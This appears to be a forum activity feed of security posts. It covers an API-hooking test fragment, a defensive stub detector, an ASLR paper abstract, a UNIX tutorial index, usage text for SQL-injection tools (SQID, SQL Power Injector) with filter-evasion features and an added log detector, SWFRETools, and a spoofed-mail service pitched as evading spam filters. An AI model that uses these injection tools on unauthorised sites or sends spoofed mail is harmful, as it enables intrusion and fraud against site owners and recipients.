    ret = windll.kernel32.OpenProcess (0x1f0fff, 0, 1)
    print "Return value: %s" % ret
    if ret == 1111: print "This test was sucesful."
    else: print "Return value is unexpected."
    # unhook API.
    # hook.unpatch ()

#cad

Download: http://www.rohitab.com/discuss/index.php?app=core&module=attach&section=attach&attach_id=3110

Source: API Hooking in Python - rohitab.com - Forums
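A defender's check for the patch that patcher.py writes, as an added example that is not part of the original post: it compares a live copy of a function with a reference copy (for instance the bytes from the DLL on disk) and decodes the `mov eax / call eax / retn` stub that get_patch() emits. The byte strings and addresses are constructed, and the example is Python 3 while the post's code is Python 2.

```python
import re
import struct

# get_patch() builds: B8 <imm32>   FF D0    C2 <imm16>
#                     mov eax,dst  call eax retn params_size
# The post packs with "i"/"h" on x86, i.e. little-endian; decode the same way.
STUB_RE = re.compile(rb"\xb8(.{4})\xff\xd0\xc2(.{2})", re.DOTALL)


def find_call_stubs(code, base_address):
    """Locate every mov-eax/call-eax/retn stub in `code` and decode its operands."""
    hits = []
    for match in STUB_RE.finditer(code):
        (destination,) = struct.unpack("<I", match.group(1))
        (params_size,) = struct.unpack("<H", match.group(2))
        hits.append({
            "offset": match.start(),
            "address": base_address + match.start(),
            "destination": destination,
            "params_size": params_size,
        })
    return hits


def modified_ranges(reference, live):
    """Byte ranges [start, end) where the live copy differs from the reference copy."""
    ranges, start = [], None
    length = min(len(reference), len(live))
    for i in range(length):
        if reference[i] != live[i]:
            if start is None:
                start = i
        elif start is not None:
            ranges.append((start, i))
            start = None
    if start is not None:
        ranges.append((start, length))
    return ranges


def audit_function(reference, live, base_address):
    """Report each modified range and whether it holds the post's hook stub."""
    stubs = find_call_stubs(live, base_address)
    findings = []
    for start, end in modified_ranges(reference, live):
        stub = next((s for s in stubs if start <= s["offset"] < end), None)
        findings.append({
            "address": base_address + start,
            "length": end - start,
            "kind": "mov-eax/call-eax/retn stub" if stub else "unclassified modification",
            "destination": stub["destination"] if stub else None,
            "params_size": stub["params_size"] if stub else None,
        })
    return findings


# Constructed sample: a 37-byte function body and a copy patched at offset 5.
# find_good_spot_to_patch() may place the stub past the entry point, so a check
# of only the first instruction bytes would see nothing unusual here.
BASE = 0x7C830000
CLEAN = bytes.fromhex(
    "8bff558bec"                 # entry bytes, left untouched by the patch
    "83ec18538b5d08568b75"       # ten bytes the stub overwrites
    "0c578b7d1033c0"
    "9090909090909090"
    "5f5e5bc9c20c00"
)
STUB = b"\xb8" + struct.pack("<I", 0x00A31000) + b"\xff\xd0\xc2" + struct.pack("<H", 12)
LIVE = CLEAN[:5] + STUB + CLEAN[15:]

if __name__ == "__main__":
    for finding in audit_function(CLEAN, LIVE, BASE):
        print({k: hex(v) if isinstance(v, int) and k != "length" else v
               for k, v in finding.items()})
```
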
-
No, it contained SQLite, so 99% it was a stealer, which among other things also targeted Firefox. I didn't bother analyzing the file; I saw that and issued a ban.
-
Address Space Randomization for Mobile Devices

Hristo Bojinov, Stanford University
Dan Boneh, Stanford University
Rich Cannings, Google, Inc.
Iliyan Malchev, Google, Inc.

ABSTRACT

Address Space Layout Randomization (ASLR) is a defensive technique supported by many desktop and server operating systems. While smartphone vendors wish to make it available on their platforms, there are technical challenges in implementing ASLR on these devices. Pre-linking, limited processing power and restrictive update processes make it difficult to use existing ASLR implementation strategies even on the latest generation of smartphones. In this paper we introduce retouching, a mechanism for executable ASLR that requires no kernel modifications and is suitable for mobile devices. We have implemented ASLR for the Android operating system and evaluated its effectiveness and performance. In addition, we introduce crash stack analysis, a technique that uses crash reports locally on the device, or in aggregate in the cloud to reliably detect attempts to brute-force ASLR protection. We expect that retouching and crash stack analysis will become standard techniques in mobile ASLR implementations.

Download: http://bojinov.org/professional/wisec2011-mobileaslr-paper.pdf
-
UNIX Tutorial for Beginners

These tutorials are derived from the excellent tutorials from the University of Surrey, UK, with some minor modifications for our site. The originals can be found here.

Typographical Conventions
Introduction to The UNIX operating system

Tutorial One
    Listing files and directories
    Making Directories
    Changing to a different Directory
    The directories . and ..
    Pathnames
    More about home directories and pathnames

Tutorial Two
    Copying Files
    Moving Files
    Removing Files and directories
    Displaying the contents of a file on the screen
    Searching the contents of a file

Tutorial Three
    Redirection
    Redirecting the Output
    Redirecting the Input
    Pipes

Tutorial Four
    Wildcards
    Filename Conventions
    Getting Help

Tutorial Five
    File system security (access rights)
    Changing access rights
    Processes and Jobs
    Listing suspended and background processes
    Killing a process

Tutorial Six
    Other Useful UNIX commands

Tutorial Seven
    Compiling UNIX software packages
    Download source code
    Extracting source code
    Configuring and creating the Makefile
    Building the package
    Running the software
    Stripping unnecessary code

Tutorial Eight
    UNIX variables
    Environment variables
    Shell variables
    Using and setting variables

UNIX Frequently Asked Questions (FAQs)
These seven articles contain the answers to some Frequently Asked Questions often seen in comp.unix.questions and comp.unix.shell.

History of UNIX
UNIX was originally developed at Bell Laboratories as a private research project by a small group of people. Read all about the history of its creation.

This tutorial is licensed under a Creative Commons License. The original version was prepared and is copyrighted by Michael Stonebank of the University of Surrey, UK.

Online: http://manuals.itc.virginia.edu/unixtut/index.html
-
SQID SQL Injection Digger

About

SQL injection digger is a command line program that looks for SQL injections and common errors in web sites. Current version can perform the following operations:

    Look for SQL injections and common errors in web site URLs found by performing a google search.
    Look for SQL injections and common errors in a given URL or a file with URLs.
    Look for SQL injections and common errors in links from a web page.
    Crawl a web site/web page and do the above.

Also supports

    Load multiple triggers from file.
    Load multiple signature databases from files.
    HTTPS support.
    HTTP proxy support with authentication.
    Basic authentication.
    Specify user agent.
    Specify referer.
    HTTP Cookies loading from command line or a file.

sqid is written in ruby. Find out more about SQL Injection. sqid is extensible by adding more signatures to its database (sqid.db). The signatures simply use regular expressions.

Usage

Usage: sqid.rb [options]

options:
    -m, --mode MODE                 Operate in mode MODE.
                                    MODE is one of
                                      g,google  Operate in google search mode.
                                      u,url     Check this url or a file with urls.
                                      p,page    Check single page.
                                      c,crawl   Crawl website and check.

Google search mode options:
    -q, --query QUERY               QUERY to perforn google search for.
    -s, --start START               zero-based index of the first desired result,
                                    zero if not specified.
    -r, --results RESULTS           number of results desired, default is 20 if not specfied.
                                    rounded to tens.

URL check mode options:
    -u, --url URL                   check this URL. If URL is a file urls will be loaded
                                    from this file, specify each url on a new line.

Page check mode options:
    -p, --page PAGE                 Check this page.

Crawl mode options:
    -c, --crawl WEBSITE             Crawl website WEBSITE and check.
                                    specfify as http[s]://WESITE:[PORT], default PORT is 80

URL, Page and Crawl mode common options:
    -C, --cookie COOKIE             Cookie in the HTTP header specify as name=value,name=value.
                                    If COOKIE is a file cookies will be loaded from this file,
                                    specify each cookie on a new line.
    -a, --accept-cookies            Accept cookies from the webite or page. Default is no.
    -R, --referer REFERER           Set referer in the HTTP header.
    -B, --auth CREDENTIALS          Use crendtials as basic auth for the website.
                                    specfify as user:password.

Common options:
    -o, --with-noquery              Match page content without query parameters. Default is false.
    -D, --db-files FILE,...,FILE    Use file(s) FILE,...,FILE as signature database.
    -t, --trigger TRIGGER           Use TRIGGER for detecting SQL injections/errors default is '.
                                    If TRIGGER is a file triggers will be loaded from it.
                                    specify each trigger on newline.
                                    Lines starting with a # are ignored.
    -T, --time-out TIMEOUT          Timeout for response in seconds. Default is 10 seconds.
    -U, --user-agent USERAGENT      User Agent in the HTTP Header.
    -P, --proxy PROXY               User HTTP proxy PROXY for operations.
                                    specfify as proxy:port.
    -A, --proxy-auth CREDENTIALS    Use crendtials CRENDENTIALS for the proxy.
                                    specfify as user:password.
    -v, --verbose                   Run verbosely.
    -h, --help                      Show this message

Download: http://rubyforge.org/frs/?group_id=2617
-
SQL Power injector

Introduction

SQL Power Injector is an application created in .Net 1.1 that helps the penetration tester to find and exploit SQL injections on a web page.

For now it is SQL Server, Oracle, MySQL, Sybase/Adaptive Server and DB2 compliant, but it is possible to use it with any existing DBMS when using the inline injection (Normal mode). Indeed, the normal mode is basically the SQL command that someone will put in the parameter sent to the server.

If the aspect of inline SQL injection is powerful in itself, its main strength dwells in the multithreaded automation of the injection. Not only is there a possibility to automate tedious and time consuming queries but you can also modify the query to get only what you want. It is obviously more useful in the blind SQL injection since the other ways to exploit the SQL injection vulnerability are more effusive and much faster when the results are displayed on the web page (union select in a HTML table and generated 500 error for instance).

The automation can be realized in two ways: comparing the expected result or by time delay. The first way is generally compared against an error or difference between positive condition with a negative one and the second way will turn out positive if the time delay sent to the server equals the one parameterized in the application.

The main effort done on this application was to make it as painless as possible to find and exploit a SQL injection vulnerability without using any browser. That is why you will notice that there is an integrated browser that will display the results of the injection parameterized in a way that any related standard SQL error will be displayed without the rest of the page. Of course, like many other features of this application, there are ways to parameterize the response of the server to make it as talkative to you as possible.

Another important part of this application is its power to get all the parameters from the web page you need to test the SQL injection, either by GET or POST method. Like this someone won't need to use several applications or a proxy to intercept the data, all is automated! Not only that, but now there is a Firefox plugin that will launch SQL Power Injector with all the information of the current webpage with its session context (parameters and cookies).

I worked hard on the application usability but I am aware that at first use it's not too obvious. I'm pretty confident that once the few things you need to comprehend are understood it will be quite easy to use afterwards. In order to help a beginner to understand its basic features I created a tutorial that not only will help him out but can also be educative for some advanced SQL injection techniques. Moreover, you will find some great tricks in the FAQ as well and now with the version 1.2 a help file (chm) containing a list of the most useful information for SQL injection.

Also, I designed this application the way I was making my own pen testing and how I was using SQL injection. It has been tested successfully many times on real life web sites (legally of course) and as soon as I see something missing I'm adding it. Now of course that it's officially available to the security community I will have to have more rigors and wait to add them in a new version of the software. This process has already started and many more features will come with time.

Finally, this application will be free of charge and hopefully be used to help in security assessments made by security professionals or to further the knowledge of the techniques used. Obviously I will not be held responsible for any misuses or damage caused by this application.

What It's Not

This application if powerful won't find SQL injection vulnerabilities for you nor will find the right syntax if one found.
Its main strength is to provide a way to find them more easily and once they are found to automate it in a way that you won't need to make every single injection if the only way to inject is using the blind technique.

Moreover, I didn't intend to make it to be a database pumping application. There are plenty of good applications for that purpose. In any case many pumped data are not relevant and since it takes time to pump it can be a real waste of time. It's better to refine and get what you really want.

Lastly, if I added the feature (mini-browser) to have the results in an HTML format it doesn't mean that it has all the features of a professional browser. Internet Explorer and Mozilla, to mention a few, are real complex software that it would be nearly impossible to implement all their features in my application. That's why you won't be able to use it as a conventional browser even though it has the same look and feel.

Features

Supported on Windows, Unix and Linux operating systems
SQL Server, Oracle, MySQL, Sybase/Adaptive Server and DB2 compliant
SSL support
Load automatically the parameters from a form or a IFrame on a web page (GET or POST)
Detect and browse the framesets
Option that auto detects the language of the web site
Detect and add cookies used during the Load Page process (Set-Cookie detection)
Find automatically the submit page(s) with its method (GET or POST) displayed in a different color
Can create/modify/delete loaded string and cookies parameters directly in the Datagrids
Single SQL injection
Blind SQL injection
    Comparison of true and false response of the page or results in the cookie
    Time delay
Response of the SQL injection in a customized browser
Can view the HTML code source of the returned page in HTML contextual colors and search in it
Fine tuning parameters and cookies injection
Can parameterize the size of the length and count of the expected result to optimize the time taken by the application to execute the SQL injection
Create/edit ASCII characters preset in order to optimize the blind SQL injection number of requests/speed
Multithreading (configurable up to 50)
Option to replace space by empty comments /**/ against IDS or filter detection
Automatically encode special characters before sending them
Automatically detect predefined SQL errors in the response page
Automatically detect a predefined word or sentence in the response page
Real time result
Save and load sessions in a XML file
Feature that automatically finds the differences between the response page of a positive answer with a negative one
Can create a range list that will replace the variable (<<@>>) inside a blind SQL injection string and automatically play them for you
Automatic replaying a variable range with a predefined list from a text file
Firefox plugin that will launch SQL Power Injector with all the information of the current webpage with its session context (parameters and cookies)
Two integrated tools: Hex and Char encoder and MS SQL @options interpreter
Can edit the Referer
Can choose a User-Agent (or even create one in the User-Agent XML file)
Can configure the application with the settings window
Support configurable proxies

Differences with Other Tools

To be honest, I didn't study all the other tools' features in all their details. The only thing I can say is that if they are great they always lack something important that I need when I'm doing SQL injection.

Some applications will find the SQL injection for you that sometimes will result in false positives. And others will generically pump the data of the database. Some of those applications got smarter and you can check for what you need when the list of databases has been pumped. Or ask a specific hard coded data, such as the current DB user. But none of them have the ability to specifically choose what you want as far as I know.
That ability comes with a cost of course, you need to know some SQL syntax, but I can assure that once someone understands how it works, not much syntax is required.

Also, I cannot recall having seen any application using the time delay feature inserted in the application. Many SQL injection vulnerabilities are impossible to exploit unless you use that technique. A technique that could be really tedious and time consuming, that often results in giving up after long hours of copy pasting the command in the browser when done manually.

I don't remember as well having seen any multithread feature that can be most definitely a really important time saver. Nor the ASCII characters preset feature that can save up to 25% the blind SQL injection. (Please look at the statistics section for some figures)

I apologize in advance to those who have made their own application and made it available on the Net that possess those features before I made SQL Power Injector available. Please let me know and I will update this section.

Summary of the differences:

Web page string and cookie parameters auto detection
Fine tuning parameters SQL injection
Time delay feature
Multithread feature
Response results in a customized browser
Automated positive and negative condition discovery
Blind SQL injection characters preset optimizer

Screenshots

You will find two screen shots demonstrating the two techniques used in the application: Normal and Blind.

Screen 1: SQL Power injector with Normal technique
Screen 2: SQL Power injector with Blind technique

Some Statistic Figures

I didn't use any scientific methods so do not consider those statistics as scientific facts but more as a general idea of what you can expect. Especially that no one controls the flux on the Net and I would be really hard pressed to give any valuable scientific data.

Another thing, I didn't make enough tests (10 times for each thread) to have a real statistical sample since the goal of these numbers will be to show approximately what you can expect. Moreover, it will depend also on the size of the data sought.

Sometimes a lower number of threads will be more effective than more. In fact, the time taken will be optimized if the length of the value is a divisible number of the number of threads. So let's say we have 24 characters length, 3, 4, 6 and 8 will be faster than any other. As a rule of thumb, the bigger gap of time between any thread is from 1 to 2. As you can see the higher is not always the better. You will see some examples in the following statistics.

Even though you can go up to 50 threads, I have discovered that around 10 threads it's starting to have errors and getting slower and slower. So again a bigger number of threads is not necessarily better. I must warn as well that the higher the number of threads is, the higher are the chances to crash the web application (web server or database).

I must thank Nathaniel Felsen for having allowed me to test on one of his web servers and my wife Elizabeth for having done all the tedious tests for me in her free time.

Here are the characteristics of the computer used to make the tests:

AMD Athlon™ 64 X2 Dual Core Processor 4200+ GHz
2 GB of RAM
Windows XP SP 2
ADSL 1 MB/s
Ping round trip average time of 173 ms

Download: http://www.sqlpowerinjector.com/download.htm
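The behaviours this post describes (one client replaying a parameter with many values, /**/ in place of spaces, and answers that alternate between fast and delayed) are visible in web access logs. The following is an added detection example, not part of the original post or of SQL Power Injector; the log records, addresses, thresholds and the `<cond-N>` placeholder values are constructed assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl, quote

INLINE_COMMENT = re.compile(r"/\*.*?\*/", re.S)  # /**/ used in place of a space

def constructed_log():
    """Constructed sample records: (client, request target, response seconds)."""
    log = [("198.51.100.7", "/item.php?id=%d" % n, 0.2) for n in (1, 2, 3)]
    for i in range(8):  # one client replaying a parameter with a changing condition
        value = quote("7/**/AND/**/<cond-%d>" % i, safe="")
        # every other answer comes back delayed, as with the time-delay technique
        log.append(("203.0.113.9", "/item.php?id=" + value, 5.1 if i % 2 else 0.2))
    return log

def analyse(records, min_variants=5, slow_seconds=4.0):
    """Group by (client, path, parameter) and flag automation-like behaviour."""
    stats = defaultdict(lambda: {"values": set(), "commented": 0, "slow": 0, "hits": 0})
    for client, target, seconds in records:
        url = urlsplit(target)
        # parse_qsl percent-decodes, so an encoded %2F%2A%2A%2F is seen as /**/
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            s = stats[(client, url.path, name)]
            s["hits"] += 1
            s["values"].add(value)
            s["commented"] += bool(INLINE_COMMENT.search(value))
            s["slow"] += seconds >= slow_seconds
    findings = {}
    for key, s in stats.items():
        reasons = []
        if len(s["values"]) >= min_variants:
            reasons.append("many-variants")      # same parameter, many payloads
        if s["commented"]:
            reasons.append("comment-as-space")   # filter-evasion spacing
        if 0 < s["slow"] < s["hits"]:
            reasons.append("mixed-delay")        # fast and delayed answers interleaved
        if len(reasons) >= 2:                    # require two signals to cut noise
            findings[key] = reasons
    return findings

if __name__ == "__main__":
    for key, reasons in analyse(constructed_log()).items():
        print(key, reasons)
```

Because the check works on decoded parameter values and timing rather than on SQL keywords, it still fires when spaces are replaced by comments or special characters are encoded.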
-
Skype in negotiations for a partnership with Microsoft?
Nytro replied to Nytro's topic in Stiri securitate
No, it was rather Google that had started the monopolizing, Microsoft has rather fallen behind... -
Who cares where they got the idea, our problem is to find ways to make a lot of money from this, easily and of course legally
-
SWFRETools 1.1.0 - Adobe Flash SWF file reverse engineering
Nytro posted a topic in Programe hacking
SWFRETools 1.1.0 - Adobe Flash SWF file reverse engineering

SWFRETools package contains three different tools. The most advanced tool is called Flash Dissector. It is a Java-based GUI tool you can use to inspect the binary content of SWF files. The second tool is a Java-based command-line tool called Minimizer. This tool is useful for vulnerability researchers that have a SWF file that crashes Flash Player and now they want to get rid of all parts of the SWF file that are not related to the crash. The third tool is a primitive Python-based debugger that can be used to hook and trace the Flash Player executable.

Download: https://github.com/sporst/SWFREtools/downloads

Source: SWFRETools 1.1.0 - Adobe Flash SWF file reverse engineering ! ~ THN : The Hackers News
-
Online Fake Mailer

As IT managed services are now focusing on clouds, so is the information security. Spam mails are the biggest threat to every individual and it is not going to end any sooner. But nowadays spam filters do their job quite efficiently, making spammers' life a bit worried. So here is an online, we mean a “cloud service”, which can test both spammers' and spam filters' skills.

Small list of features

Email Doesn’t go in spam folder
Instant delivery of emails
With Attachment Support
With HTML Editor
And Many Other Features

http://emkei.cz/